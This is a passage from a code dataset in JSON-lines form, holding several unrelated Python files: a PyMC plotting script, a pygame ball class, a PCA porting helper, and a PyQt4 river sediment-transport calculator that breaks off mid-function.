1\n\n#plot_post(theta1_sample, xlab=r'$\\theta1$', show_mode=False, labelsize=9, framealpha=0.5)\npm.plot_posterior(theta1_sample, ax=ax[1, 0], color='skyblue')\nax[1, 0].set_xlabel(r'$\\theta1$')\nax[1, 0].set_xlim(0,1)\n\n# Scatter theta 1 vs mu\nax[1, 1].scatter(theta1_sample, mu_sample, marker='o', color='skyblue')\nax[1, 1].set_xlim(0,1)\nax[1, 1].set_ylim(0,1)\nax[1, 1].set_xlabel(r'$\\theta1$')\nax[1, 1].set_ylabel(r'$\\mu$')\n\n# Scatter theta 1 vs kappa\nax[1, 2].scatter(theta1_sample, kappa_sample, marker='o', 
color='skyblue')\nax[1, 2].set_xlim(0,1)\nax[1, 2].set_xlabel(r'$\\theta1$')\nax[1, 2].set_ylabel(r'$\\kappa$')\n\n# Plot theta 2\n#plot_post(theta2_sample, xlab=r'$\\theta2$', show_mode=False, labelsize=9, framealpha=0.5)\npm.plot_posterior(theta2_sample, ax=ax[2, 0], color='skyblue')\nax[2, 0].set_xlabel(r'$\\theta2$')\nax[2, 0].set_xlim(0,1)\n\n# Scatter theta 2 vs mu\nax[2, 1].scatter(theta2_sample, mu_sample, marker='o', color='skyblue')\nax[2, 1].set_xlim(0,1)\nax[2, 1].set_ylim(0,1)\nax[2, 1].set_xlabel(r'$\\theta2$')\nax[2, 1].set_ylabel(r'$\\mu$')\n\n# Scatter theta 2 vs kappa\nax[2, 2].scatter(theta2_sample, kappa_sample, marker='o', color='skyblue')\nax[2, 2].set_xlim(0,1)\nax[2, 2].set_xlabel(r'$\\theta2$')\nax[2, 2].set_ylabel(r'$\\kappa$')\n\n# Plot theta 3\n\n#plot_post(theta3_sample, xlab=r'$\\theta3$', show_mode=False, labelsize=9, framealpha=0.5)\npm.plot_posterior(theta3_sample, ax=ax[3, 0], color='skyblue')\nax[3, 0].set_xlabel(r'$\\theta3$')\nax[3, 0].set_xlim(0,1)\n\n# Scatter theta 3 vs mu\nax[3, 1].scatter(theta3_sample, mu_sample, marker='o', color='skyblue')\nax[3, 1].set_xlim(0,1)\nax[3, 1].set_ylim(0,1)\nax[3, 1].set_xlabel(r'$\\theta3$')\nax[3, 1].set_ylabel(r'$\\mu$')\n\n# Scatter theta 3 vs kappa\nax[3, 2].scatter(theta3_sample, kappa_sample, marker='o', color='skyblue')\nax[3, 2].set_xlim(0,1)\nax[3, 2].set_xlabel(r'$\\theta3$')\nax[3, 2].set_ylabel(r'$\\kappa$')\n\nplt.tight_layout()\nplt.savefig('Figure_9.11.png')\nplt.show()\n\n","repo_name":"jiguang123/PythonProject-JobSeaking","sub_path":"Data-Analysis/09_BernBetaMuKappaPyMC.py","file_name":"09_BernBetaMuKappaPyMC.py","file_ext":"py","file_size_in_byte":5516,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"4435197376","text":"import pygame\n\nclass Ball ():\n MAX_VEL = 5\n\n def __init__(self, game):\n self.game = game\n self.radius = 5\n self.pos_x = 0\n self.pos_y = 0\n self.hitbox = pygame.Rect(self.pos_x, self.pos_y, self.radius, self.radius)\n self.hitbox.center = self.pos_x, self.pos_y\n\n self.vel_x = 0\n self.vel_y = -5\n self.sticky = True\n\n def draw(self):\n self.hitbox.center = self.pos_x, self.pos_y\n pygame.draw.circle(self.game.win, \"green\",\n (self.pos_x, self.pos_y), self.radius)\n\n def move(self):\n if self.sticky:\n self.pos_x = self.game.player.pos_x\n self.pos_y = self.game.player.pos_y - self.game.player.height//2 - self.radius\n else:\n # Collision with celing\n if self.pos_y - self.radius <= 0:\n self.vel_y *= -1\n # Collision with paddle\n if self.pos_x >= self.game.player.shape.topleft[0] and \\\n self.pos_x <= self.game.player.shape.topright[0] and \\\n (self.pos_y >= self.game.player.shape.topright[1] - self.radius + 1 and self.pos_y < self.game.player.shape.center[1]):\n self.vel_y *= -1\n difference_x = self.game.player.pos_x - self.pos_x\n reduction_factor = (self.game.player.width // 2) / self.MAX_VEL\n self.vel_x = -difference_x / reduction_factor\n\n # Collision with walls\n if self.pos_x - self.radius <= 0 or self.pos_x + self.radius >= self.game.WIDTH:\n self.vel_x *= -1\n\n self.pos_x += self.vel_x\n self.pos_y += self.vel_y","repo_name":"antono91/breakout","sub_path":"ball.py","file_name":"ball.py","file_ext":"py","file_size_in_byte":1684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20193166350","text":"from micromlgen.utils import jinja, check_type\n\n\ndef is_pca(clf):\n \"\"\"Test if classifier can be ported\"\"\"\n return 
check_type(clf, 'PCA')\n\n\ndef port_pca(clf, **kwargs):\n \"\"\"Port a PCA\"\"\"\n return jinja('pca/pca.jinja', {\n 'arrays': {\n 'components': clf.components_,\n 'mean': clf.mean_\n },\n }, {\n 'classname': 'PCA'\n }, **kwargs)","repo_name":"KaspiElectronics/CircuitML","sub_path":"circuitml/pca.py","file_name":"pca.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"es","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"38507813456","text":"from PyQt4 import QtGui, QtCore # Import the PyQt4 module we'll need\nimport sys # We need sys so that we can pass argv to QApplication\nimport inspect\nimport xlsxwriter\nimport os\n\nimport design # This file holds our MainWindow and all design related things\n # it also keeps events etc that we defined in Qt Designer\n\nimport math\n\ndef FNL(x):\n return math.log(x,10)\n\ndef WriteResultsFaixa(FormulaName, ResultFormula, ib, Fgranlabel, row, sheetSInt, sheetSIng, faixa):\n if faixa == 1:\n sheetSInt.write(row, 0, FormulaName)\n sheetSIng.write(row, 0, FormulaName)\n row+=1\n sheetSInt.write(row, 0, 'Faixa Gran (mm)')\n sheetSIng.write(row, 0, 'Faixa Gran (mm)')\n\n sheetSInt.write(row, 1, 'Fracao (%)')\n sheetSIng.write(row, 1, 'Fracao (%)')\n \n sheetSInt.write(row, 2, 'C (mg/l)')\n sheetSIng.write(row, 2, 'C (mg/l)')\n \n #sheetSInt.write(row, 3, 'Qs (ton/dia/m)')\n sheetSInt.write(row, 3, 'Qst (t/dia)')\n \n #sheetSIng.write(row, 3, 'Qs (lb/s/ft)')\n sheetSIng.write(row, 3, 'Qst (ton/dia)')\n row+=1\n\n for ci, qst, i, fg in zip(ResultFormula[3], ResultFormula[4], ib, Fgranlabel):\n sheetSInt.write(row, 0, fg)\n sheetSInt.write(row, 1, i*100)\n sheetSInt.write(row, 2, ci)\n #sheetSInt.write(row, 3, qst*43.2/0.3048)\n\n sheetSIng.write(row, 0, fg)\n sheetSIng.write(row, 1, i*100)\n sheetSIng.write(row, 2, ci)\n #sheetSIng.write(row, 3, qst)\n row+=1\n\n sheetSInt.write(row, 0, \"Total\")\n sheetSInt.write(row, 1, 100.0*sum(ib)) \n sheetSInt.write(row, 2, ResultFormula[0])\n #sheetSInt.write(row, 3, ResultFormula[1]*43.2/0.3048)\n sheetSInt.write(row, 3, ResultFormula[2])\n\n \n sheetSIng.write(row, 0, \"Total\")\n sheetSIng.write(row, 1, \"100\")\n sheetSIng.write(row, 2, ResultFormula[0])\n #sheetSIng.write(row, 3, ResultFormula[1])\n sheetSIng.write(row, 3, ResultFormula[2])\n row+=2\n else:\n sheetSInt.write(row, 0, FormulaName)\n sheetSIng.write(row, 0, FormulaName)\n row+=1\n sheetSInt.write(row, 0, 'C (mg/l)')\n sheetSIng.write(row, 0, 'C (mg/l)')\n \n #sheetSInt.write(row, 1, 'Qs (ton/dia/m)')\n sheetSInt.write(row, 1, 'Qst (t/dia)')\n \n #sheetSIng.write(row, 1, 'Qs (lb/s/ft)')\n sheetSIng.write(row, 1, 'Qst (ton/dia)')\n row+=1\n \n sheetSInt.write(row, 0, ResultFormula[0])\n #sheetSInt.write(row, 1, ResultFormula[1]*43.2/0.3048)\n sheetSInt.write(row, 1, ResultFormula[2])\n\n sheetSIng.write(row, 0, ResultFormula[0])\n #sheetSIng.write(row, 1, ResultFormula[1])\n sheetSIng.write(row, 1, ResultFormula[2])\n row+=2\n return row\n\ndef FallVelocity(D, TEMP, AF):\n DFV = D * 304.8\n SF = TEMP / 10.0\n KT = int(SF)+1\n PT = SF - KT + 1\n DL = FNL(DFV)\n M = 0\n while DFV > AF[0][M]:\n M += 1\n M -=1\n CF = FNL(AF[0][M])\n EF = FNL(AF[0][M+1])\n PD = (DL - CF)/ (EF - CF)\n ZF = []\n for L in range(2):\n K = L + KT\n ZF.append((1 - PD) * FNL(AF[K][M]) + PD * FNL(AF[K][M + 1]))\n RF = (1.0 - PT) * ZF[0] + PT * ZF[1]\n FV = 10.0**RF / 30.48\n return FV\n\ndef Laursen(DFT, ib, V, SG, g, Y, XNU, U, DF50, W):\n UGS=0\n C = 0 \n COMP1 = 6*XNU\n CList = []\n UGSList = []\n for D, i in zip(DFT[1:], 
ib[1:]):\n DELTA = 11.6*XNU/U\n FVI = (math.sqrt(36.064*D**3+COMP1**2)-COMP1)/D\n RV = U/FVI\n\n RVL = FNL(RV)\n if RV < 0.3:\n FV = 10.718*RV**0.243\n elif RV < 3.0:\n FV = 10.0**(0.855*RVL+0.62*RVL**2+1.2)\n elif RV < 20:\n FV = 4.773*RV**2.304\n elif RV < 200:\n FV = 10.0**(3.764*RVL-0.803*RVL**2+0.147)\n else:\n FV = 9680.5*RV**0.2531 \n \n RY = D/DELTA\n if RY > 0.1:\n Yc = 0.04\n elif RY < 0.03:\n Yc = 0.16\n else:\n Yc = 0.08\n \n F1 =(D/Y)**1.1667\n F2 = V**2.0/(58.0*Yc*D*(SG-1.0)*g)\n F3 =(DF50/Y)**0.3333\n \n CI = 10000.0*i*F1*(F2*F3-1.0)*FV\n \n if CI < 0:\n CI = 0\n\n UGS = UGS + 0.0000625*CI*Y*V\n\n CList.append(CI)\n UGSList.append(0.0000625*CI*Y*V)\n \n C = 16000.0 * UGS/(Y*V)\n \n return [C, UGS, UGS*43.2*W, CList, UGSList]\n\ndef EngelundeHansen (GMS, V, S, DF50, g, SG, W, Y):\n UGS = 0.05*GMS*V**2*Y**1.5*S**1.5/(DF50*g**0.5*(SG-1)**2.0)\n C = 16000.0 * UGS/(Y*V)\n return [C, UGS, UGS*43.2*W] \n\ndef Colby (DF50, Y, V, CY, CF, W, TEMP):\n D50 = DF50 * 304.8\n \n if D50 <= 0.1 or D50 >=0.8:\n print('Outside range of validity')\n return -1\n \n VC = 0.4673 * (Y ** 0.1) * (D50 ** 0.333)\n DIFF = V * 0.3048 - VC\n B = 2.5\n \n if DIFF >= 1.0:\n B = 1.453*D50**(-0.138)\n \n X = FNL(Y)\n \n N = 0\n while TEMP >= CY[3][N]:\n N = N + 1\n \n F1 = CY[4][N-1] + CY[5][N-1] * X + CY[6][N-1] * X ** 2.0\n F2 = CY[4][N] + CY[5][N] * X + CY[6][N] * X ** 2.0\n AF = F1 + (F2 - F1) * (FNL(TEMP)-FNL(CY[3][N-1])) / (FNL(CY[3][N])-FNL(CY[3][N-1]))\n AF = 10 ** AF\n \n N = 0 \n while D50 > CY[0][N]:\n N = N + 1\n\n A = CY[2][N-1]*Y**(CY[1][N-1]) \n F1 = A * DIFF ** B * (1.0 + (AF - 1.0) * CF[N-1]) * 0.672\n \n A = CY[2][N] *Y**(CY[1][N])\n F2 = A * DIFF ** B * (1.0 + (AF - 1.0) * CF[N]) * 0.672\n\n UGS = FNL(F1) + (FNL(F2)-FNL(F1)) * (FNL(D50)-FNL(CY[0][N-1]))/(FNL(CY[0][N])-FNL(CY[0][N-1]))\n UGS = 10.0**UGS\n \n C = 16000.0 * UGS/(Y*V)\n \n return [C, UGS, UGS*43.2*W]\n\ndef AckersWhite(D, g, SG, XNU, U, V, Y, W):\n DGR = D * ((g*(SG-1)/XNU**2)**0.3333)\n P = FNL(DGR)\n if DGR <= 60.0:\n AN = 1.0 - 0.56 * P\n AA = 0.23/math.sqrt(DGR)+0.14\n AM = 9.66/DGR + 1.34\n CA = 2.86 * P - P **2 - 3.53\n CA = 10.0 ** CA\n else:\n AN = 0.0\n AA = 0.17\n AM = 1.5\n CA = 0.025\n F1 = U**AN/(math.sqrt(g*D*(SG-1)))\n F2 = (V/(math.sqrt(g)*FNL(10*Y/D)))**(1.0-AN)\n F3 = F1*F2/AA-1.0\n if F3 > 0.0:\n GGR = CA * F3 ** AM\n C = (GGR*D*SG*(V/U)**AN)/Y\n C = C * 10.0**6\n UGS = 0.0000625*C*Y*V\n return [C, UGS, UGS*43.2*W]\n else:\n print(\"Concentracao menor que zero\")\n return -1\n\ndef YangD50(SoilType, FV50, DF50, TEMP, AF, D, U, XNU, V, S, Y, W):\n FV = FV50\n if DF50 < 0.0328:\n D = DF50\n FV = FallVelocity(D, TEMP, AF) \n R = U * DF50 / XNU\n F1 = 2.05\n if R < 70:\n F1 = 0.66 + 2.5/ (FNL(R) - 0.06)\n F2 = FNL(FV*DF50/XNU)\n F3 = FNL(U/FV)\n F4 = V * S / FV - F1 * S\n if F4 > 0:\n if SoilType == 'Sand':\n C = 5.435 - 0.286 * F2 - 0.457 * F3 + (1.799 - 0.409 * F2 - 0.314 * F3) * FNL(F4) #Sand\n elif SoilType == 'Gravel':\n C = 6.681 - 0.633 * F2 - 4.816 * F3 + (2.784 - 0.305 * F2 - 0.282 * F3) * FNL(F4) #Gravel\n else:\n print('Wrong soil type.')\n C = 0.0\n else:\n C = 0\n C = 10.0**C\n UGS = 0.0000625*C*Y*V\n return [C, UGS, UGS*43.2*W]\n\ndef YangFT(SoilType, ib, DFT, TEMP, AF, XNU, U, V, S, Y, W):\n C = 0\n UGS = 0\n CList = []\n UGSList = []\n for i in range(1,11):\n if ib[i] > 0:\n D = DFT[i]\n if D < 0.0328:\n FV = FallVelocity(D, TEMP, AF)\n else:\n COMP1 = 6* XNU\n FV = (math.sqrt(36.064*D**3+COMP1**2)-COMP1)/D\n R = U*D/XNU\n F1 = 2.05\n if R < 70:\n F1 = 0.66 + 2.5 / (FNL(R) - 0.06)\n F2 = 
FNL(FV*D/XNU)\n F3 = FNL(U/FV)\n CI = 0\n F4 = V*S/FV-F1*S\n if F4 > 0:\n if SoilType == 'Gravel' or (SoilType == 'Mixture' and i>5):\n CI = 6.681-0.633*F2-4.816*F3+(2.784-0.305*F2-0.282*F3)*FNL(F4)\n else:\n CI = 5.435-0.286*F2-0.457*F3+(1.799-0.409*F2-0.314*F3)*FNL(F4)\n CI = 10**CI * ib[i]\n C += CI\n UGSI = 0.0000625*CI*Y*V\n UGS += UGSI\n \n CList.append(CI)\n UGSList.append(0.0000625*CI*Y*V)\n else:\n CList.append(0.0)\n UGSList.append(0.0)\n \n return [C, UGS, UGS*43.2*W, CList, UGSList]\n \ndef Schoklitsch(DFT, ib, S, Y, V, W):\n UGS=0\n CI = 0\n CList = []\n UGSList = []\n for D, i in zip(DFT, ib):\n F1 = 25.0* S**1.5 *Y*V\n F2 = 1.6 * S**0.17\n F3 = math.sqrt(D)\n X = F1/F3 - F2*F3\n if X <= 0:\n UGSI = 0\n else:\n UGSI = i * X\n \n UGS = UGS + UGSI\n \n CI = 16000.0 * UGSI/(Y*V)\n \n CList.append(CI)\n UGSList.append(UGSI)\n \n C = 16000.0 * UGS/(Y*V)\n \n return [C, UGS, UGS*43.2*W, CList, UGSList]\n\ndef Kalinske(DFT, ib, AK0, AK1, AK2, AK3, AK4, AK5, Y, V, S, W):\n S1 = 0\n TEMP2 = []\n CList = []\n UGSList = []\n for D, i in zip(DFT, ib):\n TEMP2.append(i/D)\n S1 += i/D\n C = 0\n UGS = 0\n T0 = 62.4 * Y * S\n F1 = 25.28 * T0**0.5 / S1\n for D, i, t in zip(DFT, ib, TEMP2):\n if i > 0:\n T1 = 12 * D\n X = T1 / T0\n F2 = AK0 + AK1 * X + AK2*X**2 + AK3 * X**3 + AK4*X**4 + AK5*X**5\n F2 = 10**F2\n UGSI = F1 * T1 * t * F2\n UGS = UGS + UGSI\n CI = 16000.0 * UGSI / (Y * V)\n C = C + CI\n \n CList.append(CI)\n UGSList.append(0.0000625*CI*Y*V)\n else:\n CList.append(0.0)\n UGSList.append(0.0)\n \n return [C, UGS, UGS*43.2*W, CList, UGSList]\n \ndef MeyerPetereMuller (DF90, Dm, Y, V, S, W):\n D90 = DF90 * 304.8\n nM = (1.486*Y**(0.667)* S**0.5)/V\n QsQ = 1\n F1= 0.368*QsQ*(D90**(1.0/6.0)/nM)**1.5*Y*S - 0.0698*Dm\n UGS= abs(F1)**1.5\n C = 16000.0 * UGS/(Y*V)\n return [C, UGS, UGS*43.2*W]\n\ndef RottnerOld(GMS, SG, g, Y, V, DF50, W):\n termo1 = GMS*math.sqrt((SG-1.0)*g*Y**3.0)\n termo2 = (V/math.sqrt((SG-1.0)*g*Y) * (0.667*(DF50/Y)**1.5 + 0.14) - 0.778*(DF50/Y)**1.5)**3.0\n UGS = termo1*termo2\n C = 16000.0 * UGS/(Y*V)\n return [C, UGS, UGS*43.2*W]\n\ndef Rottner(GMS, SG, g, Y, V, DF50, W):\n R = (DF50/Y)**0.667\n F1 = V/(7.286*math.sqrt(Y))\n F2 = 0.667*R + 0.14\n UGS = 1204.8 * Y**1.5 * (F1*F2-0.778*R)**3\n C = 16000.0 * UGS/(Y*V)\n return [C, UGS, UGS*43.2*W]\n\ndef Toffaleti(TEMP, Y, S, V, DF65, g, XNU, DFT, DIP, ib, AF, NLD, W):\n TDF = 1.8*TEMP+32.0\n ZV = 0.1198+0.00048*TDF\n CZ = 260.67-0.667*TDF\n YA = Y / 11.24\n YB = Y / 2.5\n CV = 1.0 + ZV\n SI = S * Y * CZ\n U3 = V**3/(XNU*g*S)\n U2 = V/math.sqrt(DF65*g*S)\n F1 = math.log(U3)\n F2 = 4.083*math.log(U2)-3.76\n F3 = 1.864 * F1 - 9.09\n\n CList = []\n UGSList = []\n \n if F3 < F2:\n U1 = F3\n else: \n FI = (F2+9.09)/1.864\n FI = (F1 - FI)*0.43429\n if FI >= 1.7:\n U1 = F2 + 0.4\n else:\n F6 = FI * 10.0\n for F5 in range(1,18):\n F1 = F5 - F6\n if F5 < F6:\n continue \n J = F5-1\n F1 = 1.0 - F1\n F5 = DIP[J]+F1*(DIP[J+1]-DIP[J])\n U1 = F2 + F5\n \n AM = 10.0 * V / U1 \n PAM = ((XNU * 100000)**0.3333)/AM\n F1 = 100000 * PAM * S * DF65/g\n T = (0.051 + 0.00009*TDF)*1.1\n \n if PAM <= 0.5:\n A = 9.8/(PAM**1.515)\n elif PAM <= 0.66:\n A = 41.0*PAM ** 0.55\n elif PAM <= 0.72:\n A = 228.0 * PAM ** 4.68\n elif PAM <= 1.3:\n A = 49.0\n else:\n A = 23.5 * PAM ** 2.8\n\n if F1 <= 0.25:\n pass\n elif F1 <= 0.35:\n A = A*5.2*F1**1.19\n else:\n A = A*0.5/F1**1.05\n\n if A < 16:\n A = 16\n\n CT = 0\n UGS = 0\n \n for i in range(1,len(ib)):\n if i <= 1:\n GFB = 1.905/(T*A/(V**2))**1.667\n if ib[i]>0:\n if i <= 7:\n D=DFT[i]\n FV = 
FallVelocity(D, TEMP, AF)\n else:\n FV=1.6\n else:\n continue\n else:\n GFA = GFB\n GFB = GFA/3.175\n if ib[i]>0:\n if i <= 7:\n D=DFT[i]\n FV = FallVelocity(D, TEMP, AF)\n else:\n FV=1.6\n else:\n CList.append(0.0)\n UGSList.append(0.0)\n continue\n \n ZOM = FV * V/SI\n if ZOM < (1.5*ZV):\n ZOM = 1.5 * ZV\n F1 = 0.756 * ZOM - ZV\n F2 = ZOM - ZV\n F3 = 1.5 * ZOM - ZV\n F4 = 1.0 - F1\n F5 = 1.0 - F2\n F6 = 1.0 - F3\n YAF4 = YA**F4\n C = ib[i]*W\n DD = 2.0 * DFT[i]\n DDF4 = DD ** F4\n UD = CV * V * (DD/Y) ** ZV\n X = F4 * GFB / (YAF4 - DDF4)\n UGSI = X*DDF4\n UBL = UGSI/(43.2*UD*DD)\n \n if UBL > 100.0:\n UGSI = UGSI*100.0/UBL\n\n UGSI = C * UGSI\n \n if NLD != 2:\n GA = UGSI + C*GFB\n C = C*X\n YAF2 = YA**(F2-F1)\n YAF5 = YA**F5\n CF5 = C/F5\n YBF3 = YB**(F3-F2)\n YBF6 = YB**F6\n CF6 = C/F6\n CF4 = C/ F4\n GB = CF5 * YAF2 * (YB**F5 - YAF5)\n GC = CF6 * YAF2 * YBF3 * (Y**F6 - YBF6)\n UGSI = GA + GB + GC\n\n UGSI = UGSI/(43.2*W)\n UGS = UGS + UGSI\n CI = 16000 * UGSI/(Y*V)\n CT = CT + CI\n\n CList.append(CI)\n UGSList.append(0.0000625*CI*Y*V)\n \n return [CT, UGS, UGS*43.2*W, CList, UGSList]\n\nclass MainApp(QtGui.QMainWindow, design.Ui_MainWindow):\n def __init__(self):\n super(self.__class__, self).__init__()\n self.setupUi(self)\n\n self.CalcularPushButton.clicked.connect(self.RunProgram)\n self.SIntRadioButton.setChecked(True)\n self.SIngRadioButton.clicked.connect(self.ChangeToSIng)\n self.SIntRadioButton.clicked.connect(self.ChangeToSInt)\n self.CalcularDeclivPushButton.clicked.connect(self.CalcularDeclividade)\n self.actionSalvar.triggered.connect(self.Salvar)\n self.actionAbrir.triggered.connect(self.Abrir)\n self.actionSair.triggered.connect(self.Sair)\n self.ArrasteSuspensaoCheckBox.clicked.connect(self.ToogleArrasteSuspensao)\n self.ArrasteCheckBox.clicked.connect(self.ToogleArraste)\n self.actionSobre.triggered.connect(self.Sobre)\n\n def Salvar(self):\n print(\"Salvando...\")\n Local = str(self.LocalLineEdit.text())\n settings = QtCore.QSettings(Local+'.ini', QtCore.QSettings.IniFormat) \n\n for name, obj in inspect.getmembers(self):\n if isinstance(obj, QtGui.QComboBox):\n name = obj.objectName() # get combobox name\n index = obj.currentIndex() # get current index from combobox\n text = obj.itemText(index) # get the text for current index\n settings.setValue(name, text) # save combobox selection to registry\n\n if isinstance(obj, QtGui.QLineEdit):\n name = obj.objectName()\n value = obj.text()\n settings.setValue(name, value) # save ui values, so they can be restored next time\n\n if isinstance(obj, QtGui.QCheckBox):\n name = obj.objectName()\n state = obj.checkState()\n settings.setValue(name, state)\n\n print('Done!')\n \n def Abrir(self):\n print('Abrindo...')\n try:\n ArquivodeDados = QtGui.QFileDialog.getOpenFileName()\n settings = QtCore.QSettings(ArquivodeDados, QtCore.QSettings.IniFormat)\n for name, obj in inspect.getmembers(self):\n if isinstance(obj, QtGui.QComboBox):\n index = obj.currentIndex() # get current region from combobox\n name = obj.objectName()\n value = unicode(settings.value(name).toString()) \n\n if value == \"\":\n continue\n\n index = obj.findText(value) # get the corresponding index for specified string in combobox\n\n if index == -1: # add to list if not found\n obj.insertItems(0,[value])\n index = obj.findText(value)\n obj.setCurrentIndex(index)\n else:\n obj.setCurrentIndex(index) # preselect a combobox value by index \n\n if isinstance(obj, QtGui.QLineEdit):\n name = obj.objectName()\n value = unicode(settings.value(name).toString()) # get stored 
value from registry\n obj.setText(value) # restore lineEditFile\n\n if isinstance(obj, QtGui.QCheckBox):\n name = obj.objectName()\n value = int(settings.value(name).toString()) # get stored value from registry\n obj.setCheckState(value) # restore checkbox\n except:\n print('Error opening file.')\n \n def Sair(self):\n sys.stderr.write('\\r')\n if QtGui.QMessageBox.question(None, '', \"Are you sure you want to quit?\",\n QtGui.QMessageBox.Yes | QtGui.QMessageBox.No,\n QtGui.QMessageBox.No) == QtGui.QMessageBox.Yes:\n QtGui.QApplication.quit()\n\n def Sobre(self):\n QtGui.QMessageBox.information(None, 'Copyright', \"SEDIM 2.0 Copyright (C) 2017 ROBERTA CAMPEAO \\n \\nEste software foi desenvolvido na Dissertação apresentada ao Curso de Pós Graduação em Engenharia de Biossistemas da Universidade Federal Fluminense, com apoio financeiro da Fundação CAPES. \\n \\nBaseado em: HORA, Mônica de A. G. M.. Avaliação do Transporte de Sedimentos da Sub-bacia do Ribeirão do Rato, Região Noroeste do Estado do Paraná. Dissertação (Mestrado em Engenharia Civil) - Universidade Federal do Rio de Janeiro, Rio de Janeiro, 1996. 287p. \\n \\nContato: Roberta Campeão - robertacampeao@gmail.com, Mônica da Hora - dahora@vm.uff.br \\n \\nThis program comes with ABSOLUTELY NO WARRANTY. \\nThis is free software, and you are welcome to redistribute it \\nunder certain conditions; For details see readme file.\")\n os.system('Manual.pdf')\n \n def ToogleArrasteSuspensao(self):\n if self.ArrasteSuspensaoCheckBox.isChecked():\n self.LaursenCheckBox.setCheckState(1)\n self.EngelundeHansenCheckBox.setCheckState(1)\n self.ColbyCheckBox.setCheckState(1)\n self.AckersWhiteD50CheckBox.setCheckState(1)\n self.AckersWhiteD35CheckBox.setCheckState(1)\n self.YangSandD50CheckBox.setCheckState(1)\n self.YangSandFTCheckBox.setCheckState(1)\n self.YangGravelD50CheckBox.setCheckState(1)\n self.YangGravelFTCheckBox.setCheckState(1)\n self.YangMixCheckBox.setCheckState(1)\n## self.ToffaletiCheckBox.setCheckState(1)\n if not self.ArrasteSuspensaoCheckBox.isChecked():\n self.LaursenCheckBox.setCheckState(0)\n self.EngelundeHansenCheckBox.setCheckState(0)\n self.ColbyCheckBox.setCheckState(0)\n self.AckersWhiteD50CheckBox.setCheckState(0)\n self.AckersWhiteD35CheckBox.setCheckState(0)\n self.YangSandD50CheckBox.setCheckState(0)\n self.YangSandFTCheckBox.setCheckState(0)\n self.YangGravelD50CheckBox.setCheckState(0)\n self.YangGravelFTCheckBox.setCheckState(0)\n self.YangMixCheckBox.setCheckState(0)\n## self.ToffaletiCheckBox.setCheckState(0)\n\n def ToogleArraste(self):\n if self.ArrasteCheckBox.isChecked():\n self.SchoklitschCheckBox.setCheckState(1)\n self.KallinskeCheckBox.setCheckState(1)\n self.MeyerPeterICheckBox.setCheckState(1)\n self.RottnerCheckBox.setCheckState(1)\n if not self.ArrasteCheckBox.isChecked():\n self.SchoklitschCheckBox.setCheckState(0)\n self.KallinskeCheckBox.setCheckState(0)\n self.MeyerPeterICheckBox.setCheckState(0)\n self.RottnerCheckBox.setCheckState(0)\n\n def ChangeToSIng(self):\n self.LarguraUnidLabel.setText('ft')\n self.ProfUnidLabel.setText('ft')\n self.VelocUnidLabel.setText('ft/s')\n self.DeclivUnidLabel.setText('ft/ft')\n self.TempUnidLabel.setText(u'ºC')\n self.D35UnidLabel.setText('mm')\n self.D50UnidLabel.setText('mm')\n self.D65UnidLabel.setText('mm')\n self.D90UnidLabel.setText('mm')\n self.VazaoUnidLabel.setText('ft3/s')\n self.RaioUnidLabel.setText('ft')\n self.AreaUnidLabel.setText('ft2')\n\n def ChangeToSInt(self):\n self.LarguraUnidLabel.setText('m')\n self.ProfUnidLabel.setText('m')\n 
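# SI mode: lengths in m, velocity in m/s, discharge in m3/s; grain sizes stay in mm\n        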
self.VelocUnidLabel.setText('m/s')\n        self.DeclivUnidLabel.setText('m/m')\n        self.TempUnidLabel.setText(u'ºC')\n        self.D35UnidLabel.setText('mm')\n        self.D50UnidLabel.setText('mm')\n        self.D65UnidLabel.setText('mm')\n        self.D90UnidLabel.setText('mm')\n        self.VazaoUnidLabel.setText('m3/s')\n        self.RaioUnidLabel.setText('m')\n        self.AreaUnidLabel.setText('m2')\n\n    def CalcularDeclividade(self):\n        if self.SIntRadioButton.isChecked(): \n            q = float(self.VazaoLineEdit.text()) # discharge m3/s\n            n = float(self.RugosidadeLineEdit.text()) # roughness coefficient\n            R = float(self.RaioLineEdit.text()) # hydraulic radius m\n            A = float(self.AreaLineEdit.text()) # cross-section area m2\n            V = float(self.VelocLineEdit.text()) # mean velocity m/s\n            S = (q * n /(A*R**(0.666)))**2 # slope = energy gradient m/m\n            self.DeclivLineEdit.setText(str(S))\n        \n        if self.SIngRadioButton.isChecked():\n            q = float(self.VazaoLineEdit.text()) * 0.3048**3.0 # discharge m3/s\n            n = float(self.RugosidadeLineEdit.text()) # roughness coefficient\n            R = float(self.RaioLineEdit.text()) * 0.3048 # hydraulic radius m\n            V = float(self.VelocLineEdit.text()) * 0.3048 # mean velocity m/s\n            A = float(self.AreaLineEdit.text()) * 0.3048 ** 2.0 # cross-section area m2\n            S = (q * n / (A*R**(0.666)))**2 # slope = energy gradient m/m\n            self.DeclivLineEdit.setText(str(S))\n\n    def RunProgram(self):\n        try:\n            if self.SIntRadioButton.isChecked():\n                g = 32.1725 # gravitational acceleration ft/s^2\n                Y = float(self.ProfLineEdit.text()) * 1000.0 / 304.8 # depth ft\n                V = float(self.VelocLineEdit.text()) * 1000.0 / 304.8 # mean velocity ft/s\n                DF35 = float(self.D35LineEdit.text()) / 304.8 # ft\n                DF50 = float(self.D50LineEdit.text()) / 304.8 # ft\n                DF65 = float(self.D65LineEdit.text()) / 304.8 # ft\n                DF90 = float(self.D90LineEdit.text()) / 304.8 # ft\n                W = float(self.LarguraLineEdit.text())* 1000.0 / 304.8 # river width ft\n\n            if self.SIngRadioButton.isChecked():\n                g = 32.1725 # gravitational acceleration ft/s^2\n                Y = float(self.ProfLineEdit.text()) # depth ft\n                V = float(self.VelocLineEdit.text()) # mean velocity ft/s\n                DF35 = float(self.D35LineEdit.text()) / 304.8 # ft\n                DF50 = float(self.D50LineEdit.text()) / 304.8 # ft\n                DF65 = float(self.D65LineEdit.text()) / 304.8 # ft\n                DF90 = float(self.D90LineEdit.text()) / 304.8 # ft\n                W = float(self.LarguraLineEdit.text()) # river width ft\n\n            ib = [float(self.Faixa1LineEdit.text())/100, float(self.Faixa2LineEdit.text())/100,\n                  float(self.Faixa3LineEdit.text())/100, float(self.Faixa4LineEdit.text())/100,\n                  float(self.Faixa5LineEdit.text())/100, float(self.Faixa6LineEdit.text())/100,\n                  float(self.Faixa7LineEdit.text())/100, float(self.Faixa8LineEdit.text())/100,\n                  